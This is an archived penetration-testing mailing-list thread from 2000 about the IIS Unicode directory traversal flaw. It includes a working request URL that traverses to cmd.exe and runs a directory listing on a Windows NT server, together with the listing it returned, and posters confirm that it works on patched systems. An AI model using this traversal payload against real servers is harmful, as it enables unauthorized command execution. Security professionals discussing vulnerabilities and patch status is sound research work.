Re: [PEN-TEST] IIS UNICODE Strings

[Unicraft Systems <unicraft () OTERO CL>]

It works for me too!!!   =)
This was tested in an NT 4 SP6 server.


Regards,
DonSata

-----Original Message-----
From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of
Mike Ahern
Sent: Tuesday, October 31, 2000 8:14 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: Re: [PEN-TEST] IIS UNICODE Strings

Vitaly Osipov [vos () TELENOR CZ] wrote:
Hmm... I see some *very* strange strings in you
examples below... the second excaped symbol (%pc for
example) is not real escaped hex-code -if it works,
then the problem is not in Unicode at all, but in
something else
---------------------------


Trust Me, It Works!!! Which is interesting since at
least one system reported as patched appears to be
still vulnerable. I had assumed the admin either
didn't patch, or used the wrong hotfix. Perhaps that
is not the case...

The Proof is in the Pudding:
----------------------------

http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
 Directory of c:\

06/23/00  01:38p                     0 AUTOEXEC.BAT
06/23/00  01:38p                     0 CONFIG.SYS
06/23/00  01:40p        <DIR>          Dell
06/26/00  03:29p        <DIR>          INetPub
06/26/00  02:10p        <DIR>          MSSQL7
06/26/00  01:40p        <DIR>          Multimedia
Files
06/26/00  03:14p        <DIR>          My
Installations
06/27/00  01:05p        <DIR>          Program Files
06/30/00  09:00a        <DIR>          TEMP
07/10/00  11:42a        <DIR>          WINNT


 -mch



__________________________________________________
Do You Yahoo!?
> From homework help to love advice, Yahoo! Experts has your answer.
http://experts.yahoo.com/